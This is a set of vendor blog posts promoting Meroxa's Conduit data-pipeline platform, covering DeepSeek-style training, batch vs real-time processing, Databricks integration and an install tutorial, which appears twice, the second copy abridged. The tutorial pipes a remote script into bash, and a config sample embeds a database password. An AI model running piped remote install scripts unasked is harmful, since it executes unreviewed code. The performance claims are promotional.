The results of our evaluation highlight the substantial performance gains achieved by the new architecture. We are pleased with our decision to simplify and improve Conduit's internals which resulted in an increase in throughput of over 5x for certain scenarios, while further reducing the end-to-end latency. The changes allow Conduit to address even more demanding real-world scenarios.

The rollout of the new architecture is controlled via a feature flag which should ensure a smooth transition while allowing early adopters to test its capabilities in their own environments. We encourage you to experiment with this new architecture and provide feedback:

$ conduit run --preview.pipeline-arch-v2

One exciting area for future exploration is the possibility of parallelizing workers by loosening ordering guarantees, such as partitioning the record stream and processing it with multiple workers. This approach could further increase the throughput for workloads that don't demand such guarantees. Open a GitHub discussion or join us on Discord and let us know if this is something you would like to see next! Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

Unlock DeepSeek-Level Efficiency: Supercharge Your LLMs with Meroxa

DeVaris Brown — Tue, 28 Jan 2025 10:13:00 GMT

The recent DeepSeek announcement has demonstrated a powerful hybrid training approach that combines supervised learning (SL) and reinforcement learning (RL) to achieve ChatGPT-like performance with significantly fewer computational resources. At the heart of its success is an efficient multi-stage training pipeline that transitions from SL to RL while leveraging high-quality feedback loops.

At Meroxa, we believe that real-time data orchestration is critical to unlocking this level of efficiency for companies building their own LLMs. In this post, we’ll dive deeper into how DeepSeek works, how real-time data pipelines play a crucial role, and how Meroxa integrates into LLM training architectures to replicate and surpass these results.

How DeepSeek Works

DeepSeek achieves its performance through an efficient hybrid training process that combines Supervised Learning (SL) and Reinforcement Learning (RL). This multi-stage approach reduces the need for extensive datasets and computational resources while optimizing model performance.

Here’s how it works:

Detailed Stages of DeepSeek

Initial Data Collection:
- Gather labeled data from domain experts or curated datasets. This data forms the foundation for supervised learning.
Supervised Learning Pretraining:
- Train a base model using the collected labeled data. This step creates a "cold-start" model with basic capabilities, reducing the need for random exploration in RL.
Reinforcement Learning Fine-Tuning:
- Transition the pretrained model into an RL framework. The model interacts with dynamic simulations or real-world environments, learning to improve based on reward signals.
Dynamic Environment Simulations:
- Use simulations that replicate real-world conditions. These environments are continuously updated with new data to ensure training relevance.
Reward Signal Generation:
- Evaluate the model’s actions and generate reward signals based on predefined success metrics (e.g., accuracy, efficiency, or user satisfaction).
Optimized Policy:
- Iterate through multiple RL cycles, refining the model’s policy to maximize cumulative rewards.
Deployed Model:
- Deploy the trained model into production, where it operates based on its learned policy.
Production Feedback:
- Collect real-time feedback from the deployed model’s performance. This feedback loop ensures the model continues to adapt to new data or changing conditions.

How Meroxa Enables DeepSeek-Level Performance

DeepSeek’s hybrid training pipeline relies heavily on fresh, high-quality data and efficient feedback loops. Without a robust real-time data orchestration layer, replicating this efficiency is challenging. This is where Meroxa excels.

Key Benefits of Meroxa for DeepSeek-Like Architectures:

Real-Time Data Ingestion:
- Stream operational metrics, user interactions, and environment simulations into training pipelines.
- Ensure that training data is always up-to-date, reducing redundancy and improving model generalization.
Seamless Feedback Integration:
- Enable closed-loop learning by streaming production feedback (e.g., user ratings, success/failure metrics) directly into RL pipelines.
Scalable Feature Engineering:
- Use Meroxa’s platform to preprocess and transform data in real time, ensuring that training pipelines receive high-quality, actionable features.
Dynamic Environment Updates:
- Keep RL environments dynamic by feeding in live data streams, ensuring simulations stay representative of real-world conditions.

Updated Workflow

The following workflow shows how Meroxa integrates into the training pipeline to enable DeepSeek-like performance:

Detailed Integration: How Meroxa Fits into the Pipeline

1. Real-Time Data Sources

Meroxa connects to diverse real-time data sources, such as:

User interactions: Chat logs, clicks, or other behavioral data.
Operational logs: System metrics like latency, throughput, or errors.
Production feedback: Model evaluation metrics, customer ratings, or outcomes.
External APIs: Third-party data streams (e.g., stock prices, social media trends).

2. Meroxa’s Platform

Meroxa acts as the central data orchestration layer:

Connectors: Seamlessly ingest data using CDC, streaming APIs, or message queues like Kafka.
Transformation Layer: Clean, filter, and preprocess raw data streams.
Feature Engineering: Aggregate and create features needed for training (e.g., state-action pairs for RL or reward signals).

3. Training Pipeline

Supervised Learning (SL): Use Meroxa's preprocessed data to pretrain the LLM.
Reinforcement Learning (RL): Stream live data into RL environments to fine-tune the model based on up-to-date conditions.
Dynamic Simulations: Continuously update simulations with real-world data for more accurate environment modeling.

4. Deployment and Feedback

Deploy the LLM in production and monitor its performance in real time.
Stream feedback metrics back to Meroxa for ongoing training and optimization.

Real-Life Applications of DeepSeek-Like Architectures with Real-Time Data

Real-time data pipelines, enabled by platforms like Meroxa, empower businesses to train and deploy more efficient and performant large language models (LLMs) across various domains. Below, we explore detailed use cases for such architectures and highlight how real-time data integration transforms performance and adaptability.

1. Conversational AI for Customer Support

In customer support, chatbots powered by LLMs often face challenges in adapting to evolving customer queries, new product launches, or unexpected issues. Static training datasets quickly become outdated, leading to suboptimal responses and user dissatisfaction. Meroxa addresses this by streaming live chat logs, customer feedback, and conversation outcomes into the training pipeline. Supervised learning is employed initially to provide the chatbot with a strong linguistic foundation, while reinforcement learning refines its ability to resolve complex issues based on real-world feedback.

Meroxa integrates seamlessly by ingesting live interaction data through CDC connectors, transforming it into actionable features, and feeding these into the LLM’s supervised pretraining and reinforcement learning loops. The chatbot is continuously fine-tuned using data collected from production environments, creating a feedback loop that ensures it evolves alongside user expectations.

This continuous improvement cycle transforms the chatbot into a highly responsive and context-aware virtual assistant, reducing user frustration and improving resolution rates.

2. Personalized E-Commerce Recommendations

E-commerce platforms rely on recommendation engines to drive engagement and increase sales. However, static models often fail to account for real-time changes in customer behavior, such as trending products during promotions or seasonal preferences. Meroxa enables continuous real-time data integration by ingesting clickstream data, cart additions, and abandoned cart metrics.

Using Meroxa’s platform, raw customer data is transformed into actionable features and fed into reinforcement learning pipelines. The recommendation engine continuously refines its suggestions based on live user behavior and feedback loops. This enables the model to adapt dynamically, prioritizing products that align with real-time shopping trends.

3. Fraud Detection for Financial Institutions

Detecting fraud in financial transactions requires models that can quickly adapt to emerging patterns and techniques used by malicious actors. Static fraud detection systems struggle to identify new anomalies because they rely on historical data that becomes outdated. Meroxa provides a solution by streaming live transactional data, anomaly reports, and confirmed fraud cases into the training pipeline.

The system uses supervised learning for pretraining, enabling the detection of common fraud patterns. Reinforcement learning further fine-tunes the model by exposing it to real-time transaction simulations, allowing it to learn from both successful detections and missed anomalies. Meroxa’s feedback loop ensures that confirmed fraud cases are reintegrated into the training process, creating a continuously evolving fraud detection system.

This architecture ensures financial institutions are equipped with proactive, adaptive fraud detection systems that minimize losses and maintain trust.

4. Adaptive Financial Modeling

In financial modeling, LLMs are frequently used to forecast market trends, predict stock movements, or assess credit risk. However, financial markets are inherently volatile, and models trained on static datasets fail to reflect real-time conditions, leading to inaccurate predictions. Meroxa enables adaptive modeling by streaming live market data, economic indicators, and transactional logs directly into the training pipelines.

The platform facilitates the preprocessing and transformation of raw financial data into relevant features. The LLM undergoes supervised pretraining to capture long-term patterns and trends. This is followed by reinforcement learning, where the model interacts with dynamic simulations or live environments to adapt to market fluctuations. Feedback from deployed predictions informs further fine-tuning, ensuring the model’s continuous improvement.

This integration allows financial institutions to deploy models that remain accurate and reliable, even in rapidly changing economic environments.

Conclusion

DeepSeek has shown us that high-performance models don’t require endless resources—they require efficient pipelines and fresh data. With Meroxa, your team can build real-time data workflows that rival or exceed the efficiency of DeepSeek’s approach, enabling your LLMs to deliver superior results at a fraction of the cost.

Ready to build smarter, faster pipelines? Contact us to learn more about how we can help you achieve DeepSeek-level performance. Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

Real-Time vs. Batch: Why Real-Time Pipelines Are the Future

Dion Keeton — Thu, 23 Jan 2025 13:32:00 GMT

What You Need to Know About Real-Time vs. Batch Processing

More increasingly businesses need data insights faster than ever before. Whether it’s making real-time recommendations, detecting fraud, or responding to market shifts, speed is key. For decades, batch processing was the standard for managing data workflows. But with the rise of real-time pipelines, the limitations of batch processing have become clear—and businesses are shifting their focus to solutions that can keep up with the pace of modern demands.

The Limitations of Batch Processing

Batch processing involves collecting, processing, and analyzing data in scheduled intervals—daily, hourly, or even weekly. While it has served many organizations well, its limitations are becoming increasingly problematic:

Stale Data: Batch pipelines process data in bulk, which means insights are only as fresh as the last batch. This lag can lead to outdated or irrelevant insights.
Operational Inefficiencies: Processing large volumes of data simultaneously can result in resource bottlenecks, increasing costs and reducing system efficiency.
Limited Responsiveness: Batch workflows are ill-suited for use cases requiring immediate action, such as fraud detection or real-time personalization.
Complexity at Scale: As data grows in volume and velocity, batch systems become harder to scale and maintain, often requiring extensive engineering resources.

The Power of Real-Time Pipelines

Real-time pipelines, by contrast, process data as it is generated. This enables businesses to act on fresh, accurate information and unlock new possibilities for data-driven decision-making. Here’s why real-time is the future:

Always Up-to-Date Insights: Real-time pipelines ensure that data is processed and delivered continuously, enabling instant access to the latest information.
Improved Customer Experiences: Applications like recommendation engines, dynamic pricing, and chatbots thrive on real-time data to deliver personalized and timely interactions.
Proactive Decision-Making: Real-time pipelines empower businesses to detect and respond to anomalies, opportunities, or threats as they happen.
Operational Efficiency: By processing data incrementally, real-time pipelines reduce the need for resource-intensive batch jobs, leading to better cost control and scalability.

Why Meroxa’s Conduit Platform Leads in Real-Time Data Processing

Meroxa’s Conduit Platform is purpose-built to enable real-time data movement and transformation, addressing the limitations of batch processing head-on. Here’s how the Conduit Platform stands out:

1. Seamless Real-Time Integration

The Conduit Platform connects to a wide range of data sources, including databases, APIs, and event streams, ingesting data in real-time. Unlike batch-focused systems, the Conduit Platform ensures minimal latency from data source to destination.

Example: While traditional batch tools might update a dashboard once an hour, the Conduit Platform streams data continuously, keeping dashboards current with every new event.
Technical Insight: Conduit’s connectors library include Postgres, MongoDB, Kafka, and Snowflake, enabling event-driven architectures with minimal setup and configuration.

2. In-Flight Transformations

With the Conduit Platform, you can enrich, filter, and transform data as it flows through the pipeline. These in-flight transformations ensure that only relevant, clean data reaches its destination.

Comparison: Competitors often require scheduling batch ETL jobs, delaying data availability and introducing additional resource overhead.

Configuration file Example:

version: 2.2
pipelines:
  - id: file-to-file
    status: running
    connectors:
      - id: postgres-source
        type: source
        plugin: builtin:postgres
        settings:
          url: postgresql://meroxauser:meroxapass@127.0.0.1:5432/meroxadb
          table: Users
      - id: example.out
        type: destination
        plugin: builtin:file
        settings:
          path: ./users.txt
    processors:
      - id: decode
        plugin: json.decode # using a builtin processor provided by conduit.
        settings:
          field: .Payload.After

3. Scalable, Cloud-Native Architecture

The Conduit Platform’s distributed, cloud-native infrastructure is designed for high availability and fault tolerance. This makes it capable of processing large-scale, high-velocity data streams efficiently.

Example: The Conduit Platform can handle continuous streams of IoT sensor data from millions of devices, adapting dynamically to spikes in data volume.
Metric Highlight: With horizontal scaling, the Conduit Platform can process billions of events daily, reducing latency by up to 50% compared to batch systems.

4. Real-Time Observability

The Conduit Platform provides built-in observability tools, giving data engineers and analysts real-time visibility into pipeline performance. Metrics, logs, and alerts are accessible via APIs and integrations with tools like Grafana and Prometheus.

Comparison: Batch systems often rely on delayed or after-the-fact reporting, making real-time troubleshooting difficult.
Feature Highlight: Conduit’s data lineage tracking ensures transparency and simplifies compliance audits.

5. Developer-Friendly Platform

Meroxa’s Conduit Platform simplifies pipeline development with intuitive APIs, CLI tools, and pre-configured connectors, reducing the complexity of setup and maintenance.

User Perspective: Data engineers can deploy a real-time pipeline in minutes, enabling faster time-to-value compared to traditional batch workflows that require extensive setup.

Real-World Use Cases for Real-Time Pipelines

Here’s how real-time pipelines, powered by Meroxa’s Conduit Platform, are transforming industries:

E-Commerce: Real-time processing of user behavior data to deliver instant product recommendations, increasing engagement and conversion rates.
Finance: Continuous monitoring of transactions to detect fraud in real-time, reducing financial losses and enhancing customer trust.
Healthcare: Streaming IoT device data to monitor patient vitals and trigger timely interventions, improving outcomes and operational efficiency.
Logistics: Dynamic optimization of delivery routes using live traffic and weather data, reducing delays and operational costs.

Why Real-Time Is the Future

As businesses become increasingly reliant on data to drive decisions, the shift from batch to real-time pipelines is inevitable. Real-time processing provides the agility, efficiency, and accuracy that modern organizations need to thrive in competitive markets. By choosing Meroxa’s Conduit Platform, data engineers, analysts, and businesses can unlock the full potential of real-time data—without the headaches of traditional batch systems.

Ready to Go Real-Time?

Meroxa’s Conduit Platform makes it simple to build and scale real-time data pipelines. Whether you’re starting from scratch or modernizing existing batch workflows, our platform has the tools you need to succeed.

👉 **Start your real-time journey today with Meroxa’s Conduit Platform.** Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

Real-Time AI Made Simple: How Meroxa and Databricks Work Together

DeVaris Brown — Tue, 21 Jan 2025 10:59:00 GMT

In today’s fast-paced world, businesses are demanding faster and smarter insights from their data. Whether you’re building recommendation engines, real-time fraud detection systems, or dynamic pricing models, timely data can make the difference between staying ahead of the competition or falling behind.

If you’re an existing Databricks user, you already know how powerful its platform can be for large-scale data processing, advanced analytics, and AI model training. But what if you could complement Databricks with an easy-to-use, cost-effective solution for real-time data ingestion and transformation? That’s where Meroxa comes in. Together, Meroxa and Databricks empower you to harness the power of real-time AI workflows—without the complexity and costs that usually come with streaming data.

The Power of Real-Time AI

AI models are only as good as the data they’re trained on. Historically, many organizations relied on batch pipelines that ran daily or weekly, which meant that AI models were working off stale data. With real-time data, you can continuously feed the most up-to-date information into your AI pipelines—leading to more accurate predictions, faster responses to changing market conditions, and overall improved business outcomes.

However, implementing real-time streaming can be challenging. It often requires specialized infrastructure to collect, process, and deliver streaming data at scale. That’s why we built Meroxa to abstract away that complexity. Our platform seamlessly integrates with Databricks so you can transform your streaming data into insights—at a fraction of the complexity and cost.

How Meroxa and Databricks Work Together

Meroxa is designed to handle data ingestion and transformation in real-time. Databricks excels at large-scale data processing, model building, and inference. Here’s a high-level look at how data flows between the two:

Data Ingestion: Meroxa connects to various data sources—ranging from databases and APIs to IoT devices—to ingest streaming data.
Data Transformation: Meroxa processes and enriches the data in-flight, ensuring it’s clean, well-structured, and ready for analysis.
Data Lake: The transformed data is delivered to Databricks (Delta Lake), where it can be immediately leveraged for analytics or AI workflows.
Model Building and Inference: Using Databricks’ powerful notebooks and Spark-based infrastructure, data scientists train and deploy AI models.
Real-Time Predictions: The resulting insights or predictions can be pushed back into downstream applications, dashboards, or other systems for immediate action.

Pros and Cons of Real-Time Streaming with Databricks

Customer Value

Pros: Real-time data enables immediate insights, allowing you to enhance customer experiences, reduce fraud, or refine recommendations on the fly.
Cons: A real-time approach requires more diligence around data quality and governance to ensure accurate results.

Performance

Pros: Databricks, with its scalable compute engine, can handle massive throughput, making it suitable for high-velocity data streams.
Cons: If not configured properly, streaming workloads can become resource-intensive.

Complexity

Pros: Databricks notebooks provide a familiar environment for data engineers and data scientists. Meroxa’s automation reduces the complexity of managing multiple real-time data pipelines.
Cons: Setting up and managing a streaming architecture from scratch is traditionally complex. However, Meroxa alleviates much of that burden by providing managed, easy-to-configure connectors and transformations.

Compute Cost

Pros: Streaming can lower the cost of data processing by reducing reliance on batch windows and large, one-time compute spikes.
Cons: Always-on streaming clusters can drive up compute costs if not carefully orchestrated. By offloading real-time ingestion and transformations to Meroxa, you only pay for what you use, helping manage costs more effectively.

Meroxa: Real-Time AI Without the Headaches

Implementing real-time data streams shouldn’t be overwhelming—or expensive. Meroxa’s fully-managed platform abstracts away much of the complexity involved in ingesting, processing, and routing streaming data. Our ready-to-use connectors, real-time transformations, and intuitive UI make it easy to onboard new data sources and pipelines—no need to spin up additional infrastructure or juggle multiple services.

Meanwhile, Databricks handles what it does best: large-scale data processing, advanced analytics, and AI model development. Together, Meroxa and Databricks form a powerful combination that yields more accurate AI models, quicker time-to-insight, and significantly lower operational overhead.

Call to Action

Ready to unlock the potential of real-time AI? Start by using Meroxa for your data ingestion and transformation needs. Then, harness the power of Databricks for model building and inference. With Meroxa taking care of real-time data and Databricks focusing on advanced analytics and AI, you can drive powerful new insights—faster and more affordably than ever.

Get started today and see how Meroxa + Databricks can help you streamline your data pipelines, reduce operational complexity, and take your AI initiatives to the next level.

Building a Future-Proof Data Architecture: A CTO’s Guide

DeVaris Brown — Thu, 16 Jan 2025 11:06:00 GMT

As a CTO in 2025, you're facing a perfect storm of data challenges. Your board is asking about AI strategy, your teams are drowning in data silos, and everyone wants real-time insights yesterday. Meanwhile, you're trying to balance innovation with stability, cost with capability, and speed with security.

Let's cut through the noise and talk about what really matters in building a data architecture that won't be obsolete by the time you finish implementing it.

The Shifting Landscape

Remember when data architecture was simpler? When batch processing was enough, when "real-time" meant daily updates, and when AI was something you'd read about in research papers? Those days are gone, and they're not coming back.

Today's landscape demands architectures that can:

Process data in genuine real-time (not "near" real-time)
Support AI/ML workflows natively
Scale elastically without breaking the bank
Adapt to new data sources and types without requiring rebuilds

And tomorrow? The demands will only increase.

The Three Pillars of Future-Proof Architecture

After working with hundreds of CTOs and enterprise architects, we've identified three core principles that separate architectures that scale and adapt from those that become tomorrow's technical debt.

1. Real-Time First, Not Real-Time Later

Here's an uncomfortable truth: if you're not building for real-time data now, you're already behind. The "we'll add real-time later" approach is the technical equivalent of planning to dig a basement after building your house.

Real-time isn't just about speed – it's about architectural flexibility. When your foundation supports real-time data flows, batch processing becomes just a special case of your real-time capabilities, not the other way around.

What this means in practice:

Change Data Capture (CDC) should be your default approach, not an afterthought
Your data pipeline should handle streaming data natively
Event-driven architectures should be your foundation, not an add-on
Latency should be measured in milliseconds, not minutes

2. Decoupled by Design

The most future-proof architectures are those that allow components to evolve independently. Think LEGO blocks, not concrete monuments.

This means:

Embracing event-driven architectures that naturally decouple producers from consumers
Using standardized data contracts between systems
Implementing async workflows by default
Treating data platforms as products, not projects

The goal isn't just flexibility – it's survival. When (not if) you need to swap out components or add new capabilities, a decoupled architecture lets you evolve without revolution.

3. Data as a Product, Not a Byproduct

Stop treating data as something that just happens. In a future-proof architecture, data is a first-class product with:

Clear ownership and governance
Defined SLAs and quality metrics
Versioning and lifecycle management
Self-service access with proper controls

This shift in mindset changes everything from how you structure teams to how you build pipelines.

The Technical Stack That Makes It Possible

Let's examine how data architectures need to evolve to meet future demands. First, let's look at what many organizations have today versus where they need to go.

Traditional Architecture: The Legacy Approach

In traditional data architectures, we typically see:

Batch ETL Processing
- Scheduled jobs pulling data from source systems
- Complex ETL tools managing transformations
- Heavy reliance on data warehouses
- Delayed insights and high latency
Siloed ML Operations
- Separate pipelines for ML training
- Batch-oriented feature engineering
- Limited real-time inference capabilities
- Disconnected model serving
Limited Real-time Capabilities
- "Near real-time" through micro-batching
- Multiple data copies across systems
- Point-to-point integrations
- High maintenance overhead

Future-Proof Architecture: The Modern Approach

The future-proof architecture fundamentally shifts how data flows through your organization:

The Foundation Layer
- CDC captures changes instantly from source systems
- Event streaming backbone (like Kafka) provides real-time data highways
- Unified processing engine handles both streaming and batch
- Everything is real-time first, batch when needed
The Processing Layer
- Stream processing enables instant transformations
- SQL and programmatic transformations coexist
- ML models serve and train on live data
- Automatic scaling based on actual load
The Serving Layer
- Multiple serving patterns (real-time, batch, hybrid)
- Flexible consumption patterns (push, pull, subscribe)
- Universal data format support
- Granular controls and monitoring

Key Architectural Differences

The shift from traditional to future-proof architecture brings several critical improvements:

Data Freshness
- Traditional: Hours or days old
- Future-proof: Real-time or near-instantaneous
Scaling Approach
- Traditional: Vertical scaling with fixed resources
- Future-proof: Horizontal scaling with elastic resources
Integration Pattern
- Traditional: Point-to-point connections
- Future-proof: Event-driven backbone
ML/AI Support
- Traditional: Separate batch pipelines
- Future-proof: Integrated real-time feature engineering

Implementation Using Meroxa

Here's how Meroxa implements these architectural principles:

Source Integration
- Native CDC connectors for all major databases
- Zero-impact change capture
- Automatic schema evolution handling
Real-time Processing
- Instant data transformations
- Built-in stream processing
- Scalable event routing
Destination Support
- Multiple output formats and protocols
- Real-time API endpoints
- Flexible consumption patterns

Making It Real: The Implementation Roadmap

Here's how to move from theory to practice:

Phase 1: Foundation Setting (3-6 months)

Start with a single high-value data flow:

Implement CDC on your most critical data sources
Set up your real-time streaming backbone
Build your first real-time pipelines
Establish monitoring and observability

Phase 2: Scaling Out (6-12 months)

Expand your real-time capabilities:

Add more data sources and types
Implement self-service capabilities
Build out your data product framework
Establish governance patterns

Phase 3: Innovation Enablement (Ongoing)

Now you can focus on value creation:

Enable ML/AI workflows
Implement advanced analytics
Build real-time features
Enable new business capabilities

The Role of Modern Platforms

This is where platforms like Meroxa come in. We're not just another tool in your stack – we're the foundation that makes this architecture possible without requiring an army of specialists.

With Meroxa, you get:

Native CDC capabilities that just work
Real-time processing without the complexity
Built-in governance and monitoring
Enterprise-grade security and reliability

The Cost of Waiting

Every day you delay moving to a real-time, future-proof architecture is:

Another day of accumulated technical debt
Another missed opportunity for real-time insights
Another competitor potentially pulling ahead
Another AI use case you can't support

Your Next Steps

Assess your current architecture's real-time capabilities
Identify your highest-value real-time use cases
Start small but think big – pick a pilot project
Partner with platforms that support your vision

Looking Ahead

The future of data architecture isn't about bigger batch jobs or more complex ETL pipelines. It's about real-time, adaptable, and intelligent systems that can evolve as your needs change.

The question isn't whether to make this shift – it's how quickly you can make it happen.

Ready to future-proof your data architecture? Let's talk about how Meroxa can help you build a foundation for real-time success. Schedule a conversation with our solutions architects today.

Building Your First Real-Time Pipeline with Meroxa's Conduit OSS: A Step-by-Step Guide

Dion Keeton — Mon, 13 Jan 2025 12:58:00 GMT

Introduction

Real-time data pipelines have become essential for modern applications, enabling businesses to process and analyze data instantly for critical decision-making. For beginners and developers, getting started with real-time pipelines may seem daunting, but with Conduit OSS (open source), it’s easier than ever to build a seamless and reliable data stream.

This guide will walk you through the process of building your first real-time data pipeline using Meroxa’s Conduit OSS tool from setup to deployment. By the end, you’ll have a functioning pipeline that ingests, processes, and delivers data in real time.

What is Conduit?

Conduit is an open-source, real-time data integration tool designed for simplicity and scalability. With its lightweight architecture and developer-friendly tools, Conduit provides:

Ease of Use: Set up pipelines with intuitive configurations.
Real-Time Processing: Move data instantly between systems.
Scalability: Handle large data volumes effortlessly.
Flexibility: Integrate with multiple data sources and sinks.

Install Conduit

If you're using a macOS or Linux system, you can install Conduit with the following command:

$ curl https://conduit.io/install.sh | bash

If you're not using macOS or Linux system, you can still install Conduit following one of the different options provided in our installation page.

note

The Conduit binary contains both, the Conduit service and the Conduit CLI, with which you can interact with Conduit.

Initialize Conduit

First, let's initialize the working environment:

$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run 'conduit pipelines init'.
To see how you can customize your first pipeline, run 'conduit pipelines init --help'.

conduit init creates the directories where you can put your pipeline configuration files, connector binaries, and processor binaries. There's also a conduit.yaml that contains all the configuration parameters that Conduit supports.

In this guide, we'll only use the pipelines directory, since we won't need to install any additional connectors or change Conduit's default configuration.

Build a pipeline

Next, we can use the Conduit CLI to build the example pipeline:

$ conduit pipelines init

conduit pipelines init builds an example that generates flight information from an imaginary airport every second. Use conduit pipelines init --help to learn how to customize the pipeline.

If the pipelines directory, you'll notice a new file, pipeline-generator-to-file.yaml that contains our pipeline's configuration:

version: "2.2"
pipelines:
  - id: example-pipeline
    status: running
    name: "generator-to-file"
    connectors:
      - id: example-source
        type: source
        plugin: "generator"
        settings:
          # Generate field 'airline' of type string
          # Type: string
          # Optional
          format.options.airline: 'string'
          # Generate field 'scheduledDeparture' of type 'time'
          # Type: string
          # Optional
          format.options.scheduledDeparture: 'time'
          # The format of the generated payload data (raw, structured, file).
          # Type: string
          # Optional
          format.type: 'structured'
          # The maximum rate in records per second, at which records are
          # generated (0 means no rate limit).
          # Type: float
          # Optional
          rate: '1'
      - id: example-destination
        type: destination
        plugin: "file"
        settings:
          # Path is the file path used by the connector to read/write records.
          # Type: string
          # Optional
          path: './destination.txt'

The configuration above tells us some basic information about the pipeline (ID and name) and that we want Conduit to start the pipeline automatically ( status: running).

Then we see a source connector, that uses the generator plugin, which is a built-in plugin that can generate random data. The source connector's settings translate into: generate structured data, 1 record per second. Each generated record should contain an airline field (type: string) and a scheduledDeparture field (type: duration).

What follows is a destination connector where the data will be written to. It uses the file plugin, which is a built-in plugin that writes all the incoming data to a file. It has only one configuration parameter, which is the path to the file where the records will be written.

Run Conduit

With the pipeline configuration being ready, we can run Conduit:

$ conduit

Conduit is now running the pipeline. Let's check the contents of the destination.txt using:

tail -f destination.txt | jq

Every second, you should a JSON object like this:

{
  "position": "MjU=",
  "operation": "create",
  "metadata": {
    "conduit.source.connector.id": "example-pipeline:example-source",
    "opencdc.createdAt": "1730801194148460912",
    "opencdc.payload.schema.subject": "example-pipeline:example-source:payload",
    "opencdc.payload.schema.version": "1"
  },
  "key": "cHJlY2VwdG9yYWw=",
  "payload": {
    "before": null,
    "after": {
      "airline": "wheelmaker",
      "scheduledDeparture": "2024-11-05T10:06:34.148469Z"
    }
  }
}

The JSON object you see is the OpenCDC record that holds the data being streamed as well as other data and metadata. In the .payload.after field you will see the user data that was generated by the generator connector:

{
    "airline": "wheelmaker",
    "scheduledDeparture": "2024-11-05T10:06:34.148469Z"
}

The pipeline will keep streaming the data from the generator source connector to the file destination connector as long as Conduit is running. To stop Conduit, press Ctrl + C (on a Linux OS, or the equivalent on other operating systems). This will trigger a graceful shutdown that stops reads from source connectors and waits for records that are still in the pipeline to be acknowledged. The next time Conduit starts, it will start reading data from where it stopped.

Conclusion

Building a real-time pipeline with Meroxa’s Conduit OSS is straightforward, even for beginners. By following this guide, you’ve set up a reliable and scalable pipeline that delivers real-time insights. Ready to explore more? Check out Conduit’s documentation for advanced configurations and integrations.

Start building your data pipelines today and unlock the potential of real-time data! For more information on our managed platform options request a demo.

Building Your First Real-Time Pipeline with Meroxa's Conduit OSS: A Step-by-Step Guide

Dion Keeton — Mon, 13 Jan 2025 12:58:00 GMT

Introduction

What is Conduit?

Conduit is an open-source, real-time data integration tool designed for simplicity and scalability. With its lightweight architecture and developer-friendly tools, Conduit provides:

Ease of Use: Set up pipelines with intuitive configurations.
Real-Time Processing: Move data instantly between systems.
Scalability: Handle large data volumes effortlessly.
Flexibility: Integrate with multiple data sources and sinks.

Install Conduit

If you're using a macOS or Linux system, you can install Conduit with the following command:

$ curl https://conduit.io/install.sh | bash

If you're not using macOS or Linux system, you can still install Conduit following one of the different options provided in our installation page.

note

The Conduit binary contains both, the Conduit service and the Conduit CLI, with which you can interact with Conduit.

Initialize Conduit

First, let's initialize the working environment:

$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run 'conduit pipelines init'.
To see how you can customize your first pipeline, run 'conduit pipelines init --help'.

In this guide, we'll only use the pipelines directory, since we won't need to install any additional connectors or change Conduit's default configuration.

Build a pipeline

Next, we can use the Conduit CLI to build the example pipeline:

$ conduit pipelines init

conduit pipelines init builds an example that generates flight information from an imaginary airport every second. Use conduit pipelines init --help to learn how to customize the pipeline.

If the pipelines directory, you'll notice a new file, pipeline-generator-to-file.yaml that contains our pipeline's configuration:

version: "2.2"
pipelines:
  - id: example-pipeline
    status: running
    name: "generator-to-file"
    connectors:
      - id: example-source
        type: source
        plugin: "generator"
        settings:
          # Generate field 'airline' of type string
          # Type: string
          # Optional
          format.options.airline: 'string'
          # Generate field 'scheduledDeparture' of type 'time'
          # Type: string
          # Optional
          format.options.scheduledDeparture: 'time'
          # The format of the generated payload data (raw, structured, file).
          # Type: string
          # Optional
          format.type: 'structured'
          # The maximum rate in records per second, at which records are
          # generated (0 means no rate limit).
          # Type: float
          # Optional
          rate: '1'
      - id: example-destination
        type: destination
        plugin: "file"
        settings:
          # Path is the file path used by the connector to read/write records.
          # Type: string
          # Optional
          path: './destination.txt'

The configuration above tells us some basic information about the pipeline (ID and name) and that we want Conduit to start the pipeline automatically ( status: running).

Run Conduit

With the pipeline configuration being ready, we can run Conduit:

$ conduit

Conduit is now running the pipeline. Let's check the contents of the destination.txt using:

tail -f destination.txt | jq

Every second, you should a JSON object like this:

{
  "position": "MjU=",
  "operation": "create",
  "metadata": {
    "conduit.source.connector.id": "example-pipeline:example-source",
    "opencdc.createdAt": "1730801194148460912",
    "opencdc.payload.schema.subject": "example-pipeline:example-source:payload",
    "opencdc.payload.schema.version": "1"
  },
  "key": "cHJlY2VwdG9yYWw=",
  "payload": {
    "before": null,
    "after": {
      "airline": "wheelmaker",
      "scheduledDeparture": "2024-11-05T10:06:34.148469Z"
    }
  }
}

{
    "airline": "wheelmaker",
    "scheduledDeparture": "2024-11-05T10:06:34.148469Z"
}

Conclusion

Start building your data pipelines today and unlock the potential of real-time data! For more information on our managed platform options request a demo.

Solution Use Case: Accelerating AI/ML Success with Meroxa and Databricks

Dion Keeton — Fri, 10 Jan 2025 13:18:00 GMT

Overview

Organizations facing real-time data challenges can achieve up to 25% cost savings on data pipeline management while accelerating model training, improving prediction accuracy, and enhancing operational efficiency. By integrating Meroxa for seamless data movement with Databricks for scalable data processing and analytics, organizations transform their data infrastructure to meet the demands of modern AI/ML workflows.

The Challenge: Delayed Data Access and Siloed Systems

AI/ML models rely on timely, high-quality data to deliver accurate predictions and drive meaningful business outcomes. However, many organizations encounter the following issues:

Delayed Data Access: Data from critical systems—such as customer interactions, transaction logs, or marketing campaign metrics—is often processed in nightly batches. This delay results in models trained on outdated data, reducing relevance and predictive accuracy.
Siloed Systems: Data resides in disparate sources like Postgres databases, Kafka event streams, and third-party platforms. Integrating these sources involves manual workflows and complex ETL processes that introduce delays and potential errors.
Slow Model Development: Preparing data for ML workflows is time-consuming, often taking 2-3 days per iteration, slowing experimentation and innovation.
Business Impact: The lack of real-time insights impacts customer engagement and revenue. For example, abandoned carts increase, conversion rates stagnate, and opportunities for personalization are missed.

The Solution: Integration of Meroxa and Databricks

To overcome these challenges, the combination of Meroxa and Databricks offers a modern, automated solution for real-time data ingestion, processing, and analytics.

Real-Time Data Ingestion with Meroxa
- Meroxa enables seamless, real-time ingestion of data from Postgres, Kafka, and APIs into an integrated pipeline.
